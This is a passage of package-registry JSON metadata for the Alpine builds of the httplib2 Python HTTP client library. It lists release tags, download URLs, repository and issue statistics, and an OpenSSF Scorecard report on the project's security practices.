tps://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T14:44:29.143Z","dependent_packages_count":3,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":6.708380346702227,"stargazers_count":5.50825725715458,"forks_count":3.8670632885424148,"average":4.020925223099805},"purl":"pkg:apk/alpine/py-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.9","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages/py-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages/py-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages/py-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages/py-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages/py-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages/py-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":259,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-01T04:48:27.892Z","updated_at":"2023-02-01T04:48:27.892Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.9","url":"https://pkgs.alpinelinux.org/packages?branch=v3.9","ecosystem":"alpine","default":false,"packages_count":9749,"maintainers_count":154,"namespaces_count":2,"keywords_count":832,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":361},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.805Z","updated_at":"2026-08-18T05:03:05.558Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/namespaces"}},{"id":7605005,"name":"py3-httplib2-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-httplib2","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":3,"first_release_published_at":"2023-04-19T14:25:43.000Z","latest_release_published_at":"2025-09-05T04:34:46.000Z","latest_release_number":"0.30.0-r0","last_synced_at":"2026-07-27T03:03:20.694Z","created_at":"2023-04-20T00:09:22.671Z","updated_at":"2026-08-21T14:58:22.703Z","registry_url":"https://pkgs.alpinelinux.org/package/edge/community/x86_64/py3-httplib2-pyc","install_command":"apk add py3-httplib2-pyc","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_